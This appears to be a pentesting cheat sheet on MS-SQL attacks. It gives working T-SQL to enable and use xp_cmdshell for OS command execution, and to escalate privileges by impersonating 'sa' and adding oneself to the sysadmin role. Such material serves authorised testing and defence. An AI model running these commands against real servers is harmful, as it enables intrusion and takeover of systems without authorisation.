Skip to content

Pentesting MS-SQL

Port 1433 is the default port for MS-SQL.

Executing Commands

xp_cmdshell

xp_cmdshell is a stored procedure that allows you to execute commands on the underlying operating system. 

EXEC xp_cmdshell 'whoami'

However, xp_cmdshell is disabled by default. You can enable it by running the following command:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

You must have the sysadmin role to enable xp_cmdshell.

MSSQL Privilege Escalation

Impersonation of other users

SQL Server has a special permission called IMPERSONATE that allows a user to impersonate another user. This can be used to escalate privileges. 

# Find users you can impersonate
SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'
# Check if the user "sa" or any other high privileged user is mentioned

# Impersonate sa user
EXECUTE AS LOGIN = 'sa'
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')

Since the sa user is a member of the sysadmin role, you can impersonate the sa user and add yourself to the sysadmin role. 

# Add yourself to the sysadmin role
EXECUTE AS LOGIN = 'sa'
EXEC sp_addsrvrolemember '<yourUsername>', 'sysadmin';

Check if you have been added to the sysadmin role

SELECT IS_SRVROLEMEMBER('sysadmin')
# Should return 1